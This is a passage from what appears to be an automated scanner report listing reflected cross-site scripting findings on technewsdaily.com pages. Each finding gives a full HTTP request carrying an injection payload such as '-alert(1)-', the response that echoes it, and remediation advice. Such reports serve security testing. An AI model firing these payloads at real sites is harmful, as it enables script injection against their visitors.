Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 72109

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/how-to-take-good-pictures-with-your-cell-phone-100128-0111/?79067"><a>0a6ebaddcd6=1/" />
...[SNIP]...

1.90. http://www.technewsdaily.com/how-to-take-good-pictures-with-your-cell-phone-100128-0111/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /how-to-take-good-pictures-with-your-cell-phone-100128-0111/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89814'-alert(1)-'e2179e8049f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /how-to-take-good-pictures-with-your-cell-phone-100128-0111/?89814'-alert(1)-'e2179e8049f=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:55:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:55:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 71747

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
avascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/how-to-take-good-pictures-with-your-cell-phone-100128-0111/?89814'-alert(1)-'e2179e8049f=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.91. http://www.technewsdaily.com/in-the-future-computing-is-cunningly-constant--1800/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /in-the-future-computing-is-cunningly-constant--1800/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b76c4'-alert(1)-'c5a8d6b261c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /in-the-future-computing-is-cunningly-constant--1800b76c4'-alert(1)-'c5a8d6b261c/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:53:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:53:09 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40500

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
e="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/in-the-future-computing-is-cunningly-constant--1800b76c4'-alert(1)-'c5a8d6b261c/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.92. http://www.technewsdaily.com/in-the-future-computing-is-cunningly-constant--1800/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /in-the-future-computing-is-cunningly-constant--1800/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b686'-alert(1)-'7185b76cb5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /in-the-future-computing-is-cunningly-constant--1800/?1b686'-alert(1)-'7185b76cb5b=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:53:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:53:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 70513

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
"text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/in-the-future-computing-is-cunningly-constant--1800/?1b686'-alert(1)-'7185b76cb5b=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.93. http://www.technewsdaily.com/index.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /index.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 183a4'-alert(1)-'5ed71200d1a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /183a4'-alert(1)-'5ed71200d1a HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:51:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:51:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40394

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/183a4'-alert(1)-'5ed71200d1a",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.94. http://www.technewsdaily.com/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42a94'-alert(1)-'cb3bb5c705 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.php?42a94'-alert(1)-'cb3bb5c705=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:51:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:51:43 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40420

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/index.php?42a94'-alert(1)-'cb3bb5c705=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.95. http://www.technewsdaily.com/iphone-or-blackberry-your-choice-lies-in-gadget-envy--1469/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /iphone-or-blackberry-your-choice-lies-in-gadget-envy--1469/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 92e52'-alert(1)-'f823a0cd3f8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /iphone-or-blackberry-your-choice-lies-in-gadget-envy--146992e52'-alert(1)-'f823a0cd3f8/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:56:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:56:52 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40514

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/iphone-or-blackberry-your-choice-lies-in-gadget-envy--146992e52'-alert(1)-'f823a0cd3f8/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.96. http://www.technewsdaily.com/iphone-or-blackberry-your-choice-lies-in-gadget-envy--1469/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /iphone-or-blackberry-your-choice-lies-in-gadget-envy--1469/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f133'-alert(1)-'f95fe139dd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /iphone-or-blackberry-your-choice-lies-in-gadget-envy--1469/?1f133'-alert(1)-'f95fe139dd4=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:56:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:56:37 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 64587

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
avascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/iphone-or-blackberry-your-choice-lies-in-gadget-envy--1469/?1f133'-alert(1)-'f95fe139dd4=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.97. http://www.technewsdaily.com/iphone-or-blackberry-your-choice-lies-in-gadget-envy--1469/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.technewsdaily.com
Path:   /iphone-or-blackberry-your-choice-lies-in-gadget-envy--1469/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81c1a"><a>0158e735c64 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /iphone-or-blackberry-your-choice-lies-in-gadget-envy--1469/?81c1a"><a>0158e735c64=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:56:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:56:24 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 64949

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<link rel="canonical" src="http://www.technewsdaily.com/iphone-or-blackberry-your-choice-lies-in-gadget-envy--1469/?81c1a"><a>0158e735c64=1/" />
...[SNIP]...

1.98. http://www.technewsdaily.com/is-windows-phone-7-a-flop-1826/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /is-windows-phone-7-a-flop-1826/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a89f'-alert(1)-'94ec8f532ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /is-windows-phone-7-a-flop-18265a89f'-alert(1)-'94ec8f532ee/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:53:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:53:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40458

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/is-windows-phone-7-a-flop-18265a89f'-alert(1)-'94ec8f532ee/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.99. http://www.technewsdaily.com/is-windows-phone-7-a-flop-1826/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /is-windows-phone-7-a-flop-1826/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8c08'-alert(1)-'dbbffb4d24a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /is-windows-phone-7-a-flop-1826/?b8c08'-alert(1)-'dbbffb4d24a=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:53:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:53:01 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 66897

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/is-windows-phone-7-a-flop-1826/?b8c08'-alert(1)-'dbbffb4d24a=1",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.100. http://www.technewsdaily.com/job-seekers-most-overused-buzzwords-revealed-1808/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /job-seekers-most-overused-buzzwords-revealed-1808/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c22c'-alert(1)-'f93007712bc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /job-seekers-most-overused-buzzwords-revealed-18082c22c'-alert(1)-'f93007712bc/ HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:57:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:57:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40496

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var
...[SNIP]...
ype="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.technewsdaily.com/job-seekers-most-overused-buzzwords-revealed-18082c22c'-alert(1)-'f93007712bc/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

1.101. http://www.technewsdaily.com/job-seekers-most-overused-buzzwords-revealed-1808/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.technewsdaily.com
Path:   /job-seekers-most-overused-buzzwords-revealed-1808/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2168d'-alert(1)-'3dfee23b27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /job-seekers-most-overused-buzzwords-revealed-1808/?2168d'-alert(1)-'3dfee23b27=1 HTTP/1.1
Host: www.technewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;

Response

HTTP/1.1 200 OK
Date: Sat, 18 Dec 2010 02:56:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 18 Dec 2010 02:56:49 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63231

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<script type="text/javascript">
<!-
...[SNIP]...
e="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
